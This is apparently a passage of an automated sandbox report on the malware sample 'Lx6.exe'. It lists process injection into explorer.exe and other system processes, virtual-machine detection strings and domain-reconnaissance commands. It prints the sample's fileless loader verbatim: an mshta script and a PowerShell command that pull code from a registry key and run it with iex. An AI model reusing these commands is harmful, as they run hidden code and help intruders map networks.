Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00768664 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_00768664
Source: explorer.exe, 0000000E.00000000.482443266.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 0000000E.00000000.482233541.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000E.00000000.536033895.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 0000000E.00000000.482633151.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Storage Accelerator
Source: RuntimeBroker.exe, 0000001F.00000000.642513702.0000014899851000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_SystemDriverstorfltWin32_SystemDriverWin32_ComputerSystem374653StoppedOKstorfltstorfltstorfltKernel DriverManualNormalC:\Windows\system32\drivers\vmstorfl.sysMicrosoft Hyper-V Storage AcceleratorMicrosoft Hyper-V Storage AcceleratorMicrosoft Hyper-V Storage Accelerator
Source: 9AF9.bin1.20.dr Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: 9AF9.bin1.20.dr Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 0000000E.00000000.521152311.000000000CDEC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: 9AF9.bin1.20.dr Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: 9AF9.bin1.20.dr Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 0000000E.00000000.482233541.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Guest Infrastructure Driver
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_SystemDrivervmgidWin32_SystemDriverWin32_ComputerSystem374653StoppedOKvmgidvmgidvmgidKernel DriverManualNormalC:\Windows\system32\drivers\vmgid.sysMicrosoft Hyper-V Guest Infrastructure DriverMicrosoft Hyper-V Guest Infrastructure DriverMicrosoft Hyper-V Guest Infrastructure Driver
Source: explorer.exe, 0000000E.00000000.484259706.00000000085A9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 9AF9.bin1.20.dr Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: 9AF9.bin1.20.dr Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: RuntimeBroker.exe, 0000001B.00000000.604758910.000001D021800000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:H
Source: C:\Users\user\Desktop\Lx6.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00752299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_00752299
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00761577 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_00761577
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075154D FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0075154D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03022299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 35_2_03022299
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302154D FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 35_2_0302154D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03031577 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 35_2_03031577
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00401000 LoadLibraryA,GetProcAddress, 0_2_00401000
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075D977 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_0075D977
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302D977 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 35_2_0302D977

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: apnfy.msn.com
Source: C:\Windows\explorer.exe Domain query: www.msn.com
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: unknown target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2240CB00000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D023B80000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 148997F0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: D00000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\cmd.exe base: 1CEDB0F0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1FA9D410000 protect: page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1AF8B460000 protect: page execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9ABD1580 Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe Memory written: C:\Windows\System32\control.exe base: 7FF712EA12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 6C6000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 27C0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9BF5850000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2240CB00000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9FF00FB000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D023B80000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: E1A059000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 148997F0000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: DA6FC0 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: D00000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: DA6FC0 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\cmd.exe base: 7FF632277380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\cmd.exe base: 1CEDB0F0000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\cmd.exe base: 7FF632277380 Jump to behavior
Source: C:\Windows\System32\cmd.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FF635983220
Source: C:\Windows\System32\cmd.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 191D1E60000
Source: C:\Windows\System32\cmd.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FF635983220
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 19932670000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 24EF3D30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1FA9D410000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1AF8B460000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute read Jump to behavior
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute read Jump to behavior
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute read Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3528 base: 6C6000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3528 base: 7FF89ABD1580 value: EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3528 base: 27C0000 value: 80 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3528 base: 7FF89ABD1580 value: 40 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3528 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 3124 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 4372 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 4552 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 5832 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 1920 Jump to behavior
Source: C:\Windows\System32\cmd.exe Thread register set: target process: 6064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 5836
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3536
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Thread register set: target process: 1716
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Thread register set: target process: 5240
Source: unknown Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>ccqf='wscript.shell';resizeto(0,2);eval(new activexobject(ccqf).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([system.text.encoding]::ascii.getstring((wslluui "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([system.text.encoding]::ascii.getstring((wslluui "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn)) Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP" Jump to behavior
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\more.com more
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"
Source: explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.508193796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.530473355.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: explorer.exe, 0000000E.00000000.542446129.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.518351829.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.508193796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.530473355.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.501749346.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.530080768.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.459146583.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.508193796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.530473355.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Lx6.exe Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_00401673
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076B568 cpuid 0_2_0076B568
